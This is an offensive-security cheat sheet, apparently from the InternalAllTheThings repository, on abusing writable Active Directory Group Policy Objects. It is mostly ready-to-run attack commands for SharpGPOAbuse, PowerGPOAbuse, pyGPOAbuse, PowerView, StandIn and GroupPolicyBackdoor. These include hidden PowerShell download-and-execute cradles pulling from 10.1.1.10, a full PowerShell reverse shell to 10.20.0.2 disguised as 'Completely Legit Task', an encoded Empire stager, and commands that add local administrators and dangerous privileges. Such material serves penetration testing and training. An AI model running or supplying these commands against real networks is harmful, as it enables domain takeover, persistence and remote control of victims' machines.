ad-adds-group-policy-objects.md (8304B)
1 --- 2 title: "Active Directory - Group Policy Objects" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adds-group-policy-objects.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-group-policy-objects.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Group Policy Objects 12 13 > Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner 14 15 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local 16 17 GPO are stored in the DC in `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\`, inside two folders **User** and **Machine**. 18 If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`. 19 20 :warning: Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: `gpupdate /force`. 21 22 ## Find vulnerable GPO 23 24 Look a GPLink where you have the **Write** right. 25 26 ```powershell 27 Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} 28 ``` 29 30 * [cogiceo/GPOHound](https://github.com/cogiceo/GPOHound) - Offensive GPO dumping and analysis tool that leverages and enriches BloodHound data. 31 32 ```ps1 33 pipx install "git+https://github.com/cogiceo/GPOHound" 34 gpohound dump --json 35 gpohound dump --list --gpo-name 36 gpohound dump --guid 21246D99-1426-495B-9E8E-556ABDD81F94 37 gpohound dump --file scripts psscripts 38 gpohound dump --search 'VNC.*Server' --show 39 gpohound analysis --json 40 gpohound analysis --processed --object group registry 41 gpohound analysis --guid CCF6CAE3-E280-4109-8F9D-25461DBB5D67 --affected 42 gpohound analysis --computer 'SRV-PA-03.NORTH.SEVENKINGDOMS.LOCAL' --order 43 gpohound analysis --enrich 44 ``` 45 46 ## Abuse GPO with SharpGPOAbuse 47 48 * [FSecureLABS/SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) - SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. 49 50 ```powershell 51 # Build and configure SharpGPOAbuse 52 Install-Package CommandLineParser -Version 1.9.3.15 53 ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll 54 55 # Adding User Rights 56 .\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" 57 58 # Adding a Local Admin 59 .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" 60 61 # Configuring a User or Computer Logon Script 62 .\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" 63 64 # Configuring a Computer or User Immediate Task 65 # /!\ Intended to "run once" per GPO refresh, not run once per system 66 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" 67 .\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force 68 ``` 69 70 ## Abuse GPO with PowerGPOAbuse 71 72 * [rootSySdk/PowerGPOAbuse](https://github.com/rootSySdk/PowerGPOAbuse) - Powershell version of SharpGPOAbuse. 73 74 ```ps1 75 PS> . .\PowerGPOAbuse.ps1 76 77 # Adding a localadmin 78 PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' 79 80 # Assign a new right 81 PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' 82 83 # Adding a New Computer/User script 84 PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' 85 86 # Create an immediate task 87 PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' 88 ``` 89 90 ## Abuse GPO with pyGPOAbuse 91 92 * [Hackndo/pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse) - Partial python implementation of SharpGPOAbuse. 93 94 ```powershell 95 # Add john user to local administrators group (Password: H4x00r123..) 96 ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" 97 98 # Reverse shell example 99 ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 100 -powershell \ 101 -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 102 -taskname "Completely Legit Task" \ 103 -description "Dis is legit, pliz no delete" \ 104 -user 105 ``` 106 107 ## Abuse GPO with PowerView 108 109 ```powershell 110 # Enumerate GPO 111 Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} 112 113 # New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO 114 New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force 115 ``` 116 117 ## Abuse GPO with StandIn 118 119 * [FuzzySecurity/StandIn](https://github.com/FuzzySecurity/StandIn) - StandIn is a small .NET35/45 AD post-exploitation toolkit. 120 121 ```powershell 122 # Add a local administrator 123 StandIn.exe --gpo --filter Shards --localadmin user002 124 125 # Set custom right to a user 126 StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege" 127 128 # Execute a custom command 129 StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" 130 ``` 131 132 ## Abuse GPO with GroupPolicyBackdoor 133 134 * [synacktiv/GroupPolicyBackdoor](https://github.com/synacktiv/GroupPolicyBackdoor) - Group Policy Objects manipulation and exploitation framework 135 136 ```ps1 137 # Add Immediate Task to your target GPO 138 python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO' 139 140 # Clean 141 python3 gpb.py gpo clean --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --state-folder 'state_folders/2025_07_15_075047' 142 ``` 143 144 **ImmediateTask_create.ini**: 145 146 ```ps1 147 [MODULECONFIG] 148 name = Scheduled Tasks 149 type = computer 150 151 [MODULEOPTIONS] 152 task_type = immediate 153 program = cmd.exe 154 arguments = /c "whoami > C:\Temp\poc.txt" 155 156 [MODULEFILTERS] 157 filters = 158 [{ 159 "operator": "AND", 160 "type": "Computer Name", 161 "value": "ad01-srv1.corp.com" 162 }] 163 ``` 164 165 ## References 166 167 * [A Red Teamer's Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) 168 * [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) 169 * [Abusing sAMAccountName Hijacking in "GPP: Local Users and Groups" - @toffyrak - June 12, 2025](https://www.cogiceo.com/en/whitepaper_gpphijacking/) 170 * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) 171 * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) 172 * [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) 173 * [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)